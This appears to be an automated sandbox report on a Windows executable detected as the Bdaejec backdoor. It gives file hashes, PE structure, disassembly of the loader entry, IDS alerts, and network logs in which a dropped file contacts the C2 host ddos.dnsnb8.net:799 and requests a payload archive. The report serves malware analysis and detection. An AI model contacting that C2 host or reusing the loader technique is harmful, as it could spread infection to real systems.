                        Category:dropped
                        Size (bytes):4720
                        Entropy (8bit):4.485900440301002
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsgJg77aI9zUf7WpW8VYDYm8M4JPHF8+q8vBFbM2UUjEOkd:uIjfmI7CC7V7JyK3bM2UUjEOkd
                        MD5:CC3E80983422E31E3637B8039A880C27
                        SHA1:B2D8320C867CB39D73C473920A1548F8A8EC2DB1
                        SHA-256:23065C7551B779A0AD50E96096439E1BEF81959ED296E0E3F850BFB1A697A053
                        SHA-512:AAA96FCDA024E3A81E92A00D710289A2C6FC2B699B59FEC3AAADC276EC82BB310A1CAFB55D88CC859F1BDE5FECDEB6B1648BB3D1D9ED08620C15C1C208C732D1
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="443616" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Users\user\AppData\Local\Temp\oQmD.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Nv:9
                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                        Malicious:false
                        Preview:foo.
                        Process:C:\Users\user\AppData\Local\Temp\oQmD.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Nv:9
                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                        Malicious:false
                        Preview:foo.
                        Process:C:\Users\user\Desktop\1hdqYXYJkr.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):15872
                        Entropy (8bit):7.031075575407894
                        Encrypted:false
                        SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                        MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                        SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                        SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                        SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 96%
                        • Antivirus: Virustotal, Detection: 93%, Browse
                        Joe Sandbox View:
                        • Filename: 7Y18r(193).exe, Detection: malicious, Browse
                        • Filename: 7Y18r(212).exe, Detection: malicious, Browse
                        • Filename: 7Y18r(216).exe.dll, Detection: malicious, Browse
                        • Filename: 7Y18r(223).exe, Detection: malicious, Browse
                        • Filename: builder_Release.exe, Detection: malicious, Browse
                        • Filename: A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe, Detection: malicious, Browse
                        • Filename: BOTBINARY.EXE.exe, Detection: malicious, Browse
                        • Filename: BkPack.exe, Detection: malicious, Browse
                        • Filename: bss.exe, Detection: malicious, Browse
                        • Filename: C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\oQmD.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.4681984526239775
                        Encrypted:false
                        SSDEEP:6144:eIXfpi67eLPU9skLmb0b4sWSPKaJG8nAgejZMMhA2gX4WABl0uNBdwBCswSb7g:zXD94sWlLZMM6YFHr+7g
                        MD5:AF4ECC361BB1FB6BFB8BB4A8D19B03DD
                        SHA1:8BDBC74481C7A43E9C4570E9F0A2628ABE247959
                        SHA-256:A392B11388A4E3DD505DAB63A786F90E06ABA6875CA6A7B2FCA5AB6753B31828
                        SHA-512:95D49FAC22B3890D85B9444EF5A9D236C9A6214E4B4C568EBEC04C1A182FCC5C20F794E29349CDFBB925C0D4E04A7ACB3F9D78CE3FF2CAE7CE34CCFCACF6D954
                        Malicious:false
                        Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.2.!............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (console) Intel 80386, for MS Windows
                        Entropy (8bit):6.831238281051393
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.91%
                        • Win32 Executable (generic) a (10002005/4) 49.86%
                        • InstallShield setup (43055/19) 0.21%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:1hdqYXYJkr.exe
                        File size:741'539 bytes
                        MD5:ac5a278467c279e653f34a552dd7170c
                        SHA1:1a13f3fb4b8c19478204e19126dbd8d2f81cfdbe
                        SHA256:08d1bb65d58c5974d0192a4d843499305f6aecc7bc671349fc52abf931116be5
                        SHA512:16ef7752ac0e7786696149d589b412af600599c84615e8a70561dba87ba50af85780b42d8328bc478ed2f2dca7a1e87925de97847d52d7bb9d50b5d98028ca62
                        SSDEEP:12288:jW3KnxvU+WZm6KGMYBFzQAyz8mFu1vdTXPMp1N6Gx:iQG8LjYC8mQ19/Wh
                        TLSH:29F46CF0E7C8CB72C69F0B3510715E68462AFE7C49A1EB2F154D35BD6E3A344825922B
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........wq..."..."..."]..#..."]..#'.."]..#..."LE.#..."]..#..."..."..."LE.#..."LE.#..."}F.#..."}F.#..."Rich..."................PE..L..
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0x141f000
                        Entrypoint Section:k)u
                        Digitally signed:false
                        Imagebase:0x1370000
                        Subsystem:windows cui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66A02999 [Tue Jul 23 22:07:21 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:44bf580ed80314abe1c845a9a625d03b
                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 0000016Ch
                        xor eax, eax
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [ebp-24h], eax
                        mov dword ptr [ebp-10h], eax
                        mov dword ptr [ebp-14h], eax
                        mov dword ptr [ebp-08h], eax
                        mov dword ptr [ebp-0Ch], eax
                        mov dword ptr [ebp-20h], eax
                        mov dword ptr [ebp-18h], eax
                        mov dword ptr [ebp-48h], 446D516Fh
                        mov dword ptr [ebp-44h], 6578652Eh
                        mov dword ptr [ebp-40h], 00000000h
                        mov dword ptr [ebp-3Ch], 00000000h
                        call 00007F75D8710D65h
                        pop eax
                        add eax, 00000225h
                        mov dword ptr [ebp-04h], eax
                        mov eax, dword ptr fs:[00000030h]
                        mov dword ptr [ebp-28h], eax
                        mov eax, dword ptr [ebp-04h]
                        mov dword ptr [eax], E904C483h
                        mov eax, dword ptr [ebp-04h]
                        mov dword ptr [eax+04h], FFF5985Ah
                        mov eax, dword ptr [ebp-28h]
                        mov eax, dword ptr [eax+0Ch]
                        mov eax, dword ptr [eax+1Ch]
                        mov eax, dword ptr [eax]
                        mov eax, dword ptr [eax+08h]
                        mov ecx, dword ptr [eax+3Ch]
                        mov ecx, dword ptr [ecx+eax+78h]
                        add ecx, eax
                        mov edi, dword ptr [ecx+1Ch]
                        mov ebx, dword ptr [ecx+20h]
                        mov esi, dword ptr [ecx+24h]
                        mov ecx, dword ptr [ecx+18h]
                        add esi, eax
                        add edi, eax
                        add ebx, eax
                        xor edx, edx
                        mov dword ptr [ebp-30h], esi
                        mov dword ptr [ebp-1Ch], edx
                        mov dword ptr [ebp-34h], ecx
                        cmp edx, dword ptr [ebp-34h]
                        jnc 00007F75D8710EAEh
                        movzx ecx, word ptr [esi+edx*2]
                        mov edx, dword ptr [ebx+edx*4]
                        mov esi, dword ptr [edi+ecx*4]
                        add edx, eax
                        mov ecx, dword ptr [edx]
                        add esi, eax
                        cmp ecx, 4D746547h
                        jne 00007F75D8710DB4h
                        cmp dword ptr [edx+04h], 6C75646Fh
                        jne 00007F75D8710DABh
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb40000x1020k)u
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xad0000x1f94.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x273a80x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x274000x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x272e80x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x200000x174.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x1f0000x1f0006f28c346cb1fee1e706670ed6ef7ab56False0.5767940398185484data6.59953210814888IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x200000xb0000xb00099d16aeb54f4bd041e86691b4cca2a29False0.3690740411931818data4.658740732252244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x2b0000x810000x81000d23908f26c1efedd958eab5f98e40a69False0.5113232043362403data6.90151184862656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .bsS0xac0000x10000x100053bc81b388800907fe32b0944a1c8bf8False0.182373046875data2.17167838585446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .reloc0xad0000x20000x2000c4befdd17cfc9b5c4833bb93b1955edaFalse0.7506103515625data6.525813767751678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        k)u0xaf0000x60a30x60a363eef293fdf9fed25dbfb06966e236bfFalse0.5931120902219168data5.793412256128098IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        DLLImport
                        kernel32.dllGetCPInfo, CreateFileW, WaitForSingleObject, CreateThread, VirtualAllocEx, FreeConsole, RaiseException
                        KERNELBASE.dllInitOnceBeginInitialize, InitOnceComplete
                        kernel32.dllCloseHandle, GetCurrentThreadId, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WakeAllConditionVariable
                        KERNELBASE.dllSleepConditionVariableSRW
                        kernel32.dllGetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetStringTypeW, WriteConsoleW, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, HeapSize, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleFileNameW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle
                        user32.dllOffsetRect
                        kernel32.dllGetCurrentPackageId, GetSystemTimePreciseAsFileTime
                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                        2024-08-06T12:33:52.850053+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6534253192.168.2.41.1.1.1
                        2024-08-06T12:33:53.346605+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49730799192.168.2.444.221.84.105
                        TimestampSource PortDest PortSource IPDest IP
                        Aug 6, 2024 12:33:52.956944942 CEST49730799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:52.962110996 CEST7994973044.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:52.962198019 CEST49730799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:52.964207888 CEST49730799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:52.969118118 CEST7994973044.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:53.346537113 CEST7994973044.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:53.346605062 CEST49730799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:53.346694946 CEST7994973044.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:53.346782923 CEST49730799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:53.347749949 CEST49730799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:53.352586985 CEST7994973044.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:57.749131918 CEST49736799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:57.753968954 CEST7994973644.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:57.754069090 CEST49736799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:58.328504086 CEST7994973644.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:58.328573942 CEST7994973644.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:58.328592062 CEST49736799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:58.328608990 CEST7994973644.221.84.105192.168.2.4
                        Aug 6, 2024 12:33:58.328624010 CEST49736799192.168.2.444.221.84.105
                        Aug 6, 2024 12:33:58.328651905 CEST49736799192.168.2.444.221.84.105
                        Aug 6, 2024 12:34:14.197254896 CEST49736799192.168.2.444.221.84.105
                        TimestampSource PortDest PortSource IPDest IP
                        Aug 6, 2024 12:33:52.850053072 CEST6534253192.168.2.41.1.1.1
                        Aug 6, 2024 12:33:52.947223902 CEST53653421.1.1.1192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Aug 6, 2024 12:33:52.850053072 CEST192.168.2.41.1.1.10x9afcStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Aug 6, 2024 12:33:52.947223902 CEST1.1.1.1192.168.2.40x9afcNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                        • ddos.dnsnb8.net:799
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.44973044.221.84.1057996316C:\Users\user\AppData\Local\Temp\oQmD.exe
                        TimestampBytes transferredDirectionData
                        Aug 6, 2024 12:33:52.964207888 CEST288OUTGET /cj//k1.rar HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: ddos.dnsnb8.net:799
                        Connection: Keep-Alive


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:06:33:51
                        Start date:06/08/2024
                        Path:C:\Users\user\Desktop\1hdqYXYJkr.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\1hdqYXYJkr.exe"
                        Imagebase:0x950000
                        File size:741'539 bytes
                        MD5 hash:AC5A278467C279E653F34A552DD7170C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:06:33:51
                        Start date:06/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:06:33:51
                        Start date:06/08/2024
                        Path:C:\Users\user\AppData\Local\Temp\oQmD.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\oQmD.exe
                        Imagebase:0x800000
                        File size:15'872 bytes
                        MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 96%, ReversingLabs
                        • Detection: 93%, Virustotal, Browse
                        Reputation:moderate
                        Has exited:true

                        Target ID:5
                        Start time:06:33:51
                        Start date:06/08/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 312
                        Imagebase:0x7ff7699e0000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:06:33:56
                        Start date:06/08/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 1412
                        Imagebase:0xf80000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:0.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:2.6%
                          Total number of Nodes:1000
                          Total number of Limit Nodes:2
                          execution_graph 17552 9ff000 17554 9ff044 GetPEB 17552->17554 17556 9ff077 CreateFileA 17554->17556 17557 9ff22d 17556->17557 17558 9ff265 17556->17558 17559 9ff246 WriteFile 17557->17559 17560 9ff244 17557->17560 17561 9ff255 FindCloseChangeNotification WinExec 17559->17561 17560->17561 17561->17558 16038 958949 16039 958955 ___scrt_is_nonwritable_in_current_image 16038->16039 16067 958501 16039->16067 16041 95895c 16042 958ab5 16041->16042 16054 958986 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 16041->16054 16106 958dfe IsProcessorFeaturePresent 16042->16106 16044 958abc 16110 9606b7 16044->16110 16049 9589a5 16052 958a26 16086 960c7e 16052->16086 16054->16049 16054->16052 16055 958a1f 16054->16055 16075 960691 16055->16075 16057 958a2c 16090 955378 FreeConsole 16057->16090 16068 95850a 16067->16068 16120 958bf5 IsProcessorFeaturePresent 16068->16120 16072 95851b 16074 95851f 16072->16074 16130 95b7ab 16072->16130 16074->16041 16076 9606a7 _unexpected 16075->16076 16077 95db7b ___scrt_is_nonwritable_in_current_image 16075->16077 16076->16052 16193 962e60 GetLastError 16077->16193 16087 960c87 16086->16087 16088 960c8c 16086->16088 16583 9609d8 16087->16583 16088->16057 16921 951d8b 16090->16921 16107 958e14 __fread_nolock std::locale::_Setgloballocale 16106->16107 16108 958ebf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16107->16108 16109 958f03 std::locale::_Setgloballocale 16108->16109 16109->16044 16111 96049f std::locale::_Setgloballocale 23 API calls 16110->16111 16112 958ac2 16111->16112 16113 96067b 16112->16113 16114 96049f std::locale::_Setgloballocale 23 API calls 16113->16114 16115 958aca 16114->16115 16116 95925f 16115->16116 16117 959275 16116->16117 16119 958ad0 __scrt_common_main_seh 16117->16119 17551 959212 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16117->17551 16121 958516 16120->16121 16122 95b78c 16121->16122 16136 95c85c 16122->16136 16125 95b795 16125->16072 16127 95b79d 16128 95b7a8 16127->16128 16150 95c898 16127->16150 16128->16072 16131 95b7b4 16130->16131 16132 95b7be 16130->16132 16133 95bad0 ___vcrt_uninitialize_ptd 6 API calls 16131->16133 16132->16074 16134 95b7b9 16133->16134 16135 95c898 ___vcrt_uninitialize_locks DeleteCriticalSection 16134->16135 16135->16132 16137 95c865 16136->16137 16139 95c88e 16137->16139 16141 95b791 16137->16141 16154 95cc11 16137->16154 16140 95c898 ___vcrt_uninitialize_locks DeleteCriticalSection 16139->16140 16140->16141 16141->16125 16142 95ba9d 16141->16142 16174 95cb22 16142->16174 16147 95bacd 16147->16127 16149 95bab2 16149->16127 16151 95c8c2 16150->16151 16152 95c8a3 16150->16152 16151->16125 16153 95c8ad DeleteCriticalSection 16152->16153 16153->16151 16153->16153 16161 95ca37 16154->16161 16157 95cc49 InitializeCriticalSectionAndSpinCount 16158 95cc47 16157->16158 16158->16137 16159 95cc34 16160 95cc11 5 API calls 16159->16160 16160->16158 16162 95ca54 16161->16162 16165 95ca58 16161->16165 16162->16157 16162->16159 16163 95cac0 GetProcAddress 16163->16162 16166 95cace 16163->16166 16165->16162 16165->16163 16167 95cab1 16165->16167 16169 95cad7 LoadLibraryExW 16165->16169 16166->16162 16167->16163 16168 95cab9 FreeLibrary 16167->16168 16168->16163 16170 95cb1e 16169->16170 16171 95caee GetLastError 16169->16171 16170->16165 16171->16170 16172 95caf9 16171->16172 16172->16170 16173 95cb0f LoadLibraryExW 16172->16173 16173->16165 16175 95ca37 ___vcrt_FlsGetValue 5 API calls 16174->16175 16176 95cb3c 16175->16176 16177 95cb55 TlsAlloc 16176->16177 16178 95baa7 16176->16178 16178->16149 16179 95cbd3 16178->16179 16180 95ca37 ___vcrt_FlsGetValue 5 API calls 16179->16180 16181 95cbed 16180->16181 16182 95cc08 TlsSetValue 16181->16182 16183 95bac0 16181->16183 16182->16183 16183->16147 16184 95bad0 16183->16184 16185 95bae0 16184->16185 16186 95bada 16184->16186 16185->16149 16188 95cb5d 16186->16188 16189 95ca37 ___vcrt_FlsGetValue 5 API calls 16188->16189 16190 95cb77 16189->16190 16191 95cb8f TlsFree 16190->16191 16192 95cb83 16190->16192 16191->16192 16192->16185 16194 962e76 16193->16194 16195 962e7c 16193->16195 16231 963b8a 16194->16231 16199 962e80 SetLastError 16195->16199 16236 963bc9 16195->16236 16203 962f15 16199->16203 16204 95db8c 16199->16204 16207 95d05b CallUnexpected 39 API calls 16203->16207 16220 95d05b 16204->16220 16205 962ec6 16209 963bc9 __strnicoll 6 API calls 16205->16209 16206 962eb5 16208 963bc9 __strnicoll 6 API calls 16206->16208 16210 962f1a 16207->16210 16211 962ec3 16208->16211 16212 962ed2 16209->16212 16248 96314b 16211->16248 16213 962ed6 16212->16213 16214 962eed 16212->16214 16215 963bc9 __strnicoll 6 API calls 16213->16215 16254 962c8e 16214->16254 16215->16211 16219 96314b ___free_lconv_mon 14 API calls 16219->16199 16455 963253 16220->16455 16223 95d06b 16225 95d075 IsProcessorFeaturePresent 16223->16225 16230 95d094 16223->16230 16227 95d081 16225->16227 16226 96067b std::locale::_Setgloballocale 23 API calls 16229 95d09e 16226->16229 16485 95cde3 16227->16485 16230->16226 16259 963979 16231->16259 16233 963ba6 16234 963bc1 TlsGetValue 16233->16234 16235 963baf 16233->16235 16235->16195 16237 963979 _unexpected 5 API calls 16236->16237 16238 963be5 16237->16238 16239 963c03 TlsSetValue 16238->16239 16240 962e98 16238->16240 16240->16199 16241 96367b 16240->16241 16246 963688 __strnicoll 16241->16246 16242 9636c8 16276 95fc57 16242->16276 16243 9636b3 HeapAlloc 16244 962ead 16243->16244 16243->16246 16244->16205 16244->16206 16246->16242 16246->16243 16273 960179 16246->16273 16249 963156 HeapFree 16248->16249 16250 963180 16248->16250 16249->16250 16251 96316b GetLastError 16249->16251 16250->16199 16252 963178 __dosmaperr 16251->16252 16253 95fc57 __strnicoll 12 API calls 16252->16253 16253->16250 16313 962b22 16254->16313 16260 9639a7 16259->16260 16264 9639a3 _unexpected 16259->16264 16260->16264 16265 9638ae 16260->16265 16263 9639c1 GetProcAddress 16263->16264 16264->16233 16271 9638bf 16265->16271 16266 963955 16266->16263 16266->16264 16267 9638dd LoadLibraryExW 16268 96395c 16267->16268 16269 9638f8 GetLastError 16267->16269 16268->16266 16270 96396e FreeLibrary 16268->16270 16269->16271 16270->16266 16271->16266 16271->16267 16272 96392b LoadLibraryExW 16271->16272 16272->16268 16272->16271 16279 9601a6 16273->16279 16290 962fb1 GetLastError 16276->16290 16278 95fc5c 16278->16244 16280 9601b2 ___scrt_is_nonwritable_in_current_image 16279->16280 16285 95dbf8 EnterCriticalSection 16280->16285 16282 9601bd 16286 9601f9 16282->16286 16285->16282 16289 95dc40 LeaveCriticalSection 16286->16289 16288 960184 16288->16246 16289->16288 16291 962fc7 16290->16291 16294 962fcd 16290->16294 16292 963b8a __strnicoll 6 API calls 16291->16292 16292->16294 16293 963bc9 __strnicoll 6 API calls 16295 962fe9 16293->16295 16294->16293 16310 962fd1 SetLastError 16294->16310 16297 96367b __strnicoll 12 API calls 16295->16297 16295->16310 16298 962ffe 16297->16298 16299 963006 16298->16299 16300 963017 16298->16300 16301 963bc9 __strnicoll 6 API calls 16299->16301 16302 963bc9 __strnicoll 6 API calls 16300->16302 16303 963014 16301->16303 16304 963023 16302->16304 16308 96314b ___free_lconv_mon 12 API calls 16303->16308 16305 963027 16304->16305 16306 96303e 16304->16306 16307 963bc9 __strnicoll 6 API calls 16305->16307 16309 962c8e __strnicoll 12 API calls 16306->16309 16307->16303 16308->16310 16311 963049 16309->16311 16310->16278 16312 96314b ___free_lconv_mon 12 API calls 16311->16312 16312->16310 16314 962b2e ___scrt_is_nonwritable_in_current_image 16313->16314 16327 95dbf8 EnterCriticalSection 16314->16327 16316 962b38 16328 962b68 16316->16328 16319 962c34 16320 962c40 ___scrt_is_nonwritable_in_current_image 16319->16320 16332 95dbf8 EnterCriticalSection 16320->16332 16322 962c4a 16333 962e15 16322->16333 16324 962c62 16337 962c82 16324->16337 16327->16316 16331 